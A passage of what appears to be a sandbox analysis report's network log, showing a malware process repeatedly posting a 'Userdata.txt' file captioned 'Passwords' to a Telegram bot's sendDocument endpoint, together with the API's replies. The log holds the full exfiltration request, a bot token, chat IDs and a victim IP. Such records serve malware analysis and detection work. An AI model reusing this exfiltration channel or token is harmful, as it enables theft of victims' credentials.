2025-01-11 06:24:40 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 36 30 65 64 64 62 30 39 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3360eddb09a8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:40 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:40 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:40 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43782,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576680,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	50048	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:41 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33721b5eeed7 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:41 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 37 32 31 62 35 65 65 65 64 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33721b5eeed7Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:41 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:41 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:41 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43783,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576681,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	50050	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:43 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3385df447484 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:43 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 38 35 64 66 34 34 37 34 38 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3385df447484Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:43 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:43 GMT Content-Type: application/json Content-Length: 543 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:43 UTC	543	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43784,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576683,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	50052	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:44 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33984405d90a Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:44 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 39 38 34 34 30 35 64 39 30 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33984405d90aContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:45 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:44 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:45 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43785,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576684,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	50054	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:46 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33b5145197d2 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:46 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 62 35 31 34 35 31 39 37 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33b5145197d2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:47 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:47 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:47 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43786,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576687,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	50056	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:48 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33cf2e35ee98 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:48 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 63 66 32 65 33 35 65 65 39 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33cf2e35ee98Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:49 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:48 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:49 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 38 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43787,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576688,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	50058	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:50 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33e3ffe66eb3 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:50 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 65 33 66 66 65 36 36 65 62 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33e3ffe66eb3Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:50 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:50 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-11 06:24:50 UTC	542	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 37 38 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 37 36 36 39 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e Data Ascii: {"ok":true,"result":{"message_id":43788,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736576690,"document":{"file_n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	50060	149.154.167.220	443	7776	C:\Users\user\Desktop\grrezORe7h.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 06:24:51 UTC	295	OUT	POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd33fb59f8d8ed Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-11 06:24:51 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 33 66 62 35 39 66 38 64 38 65 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd33fb59f8d8edContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-11 06:24:52 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Sat, 11 Jan 2025 06:24:52 GMT Content-Type: application/json Content-Length: 542 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
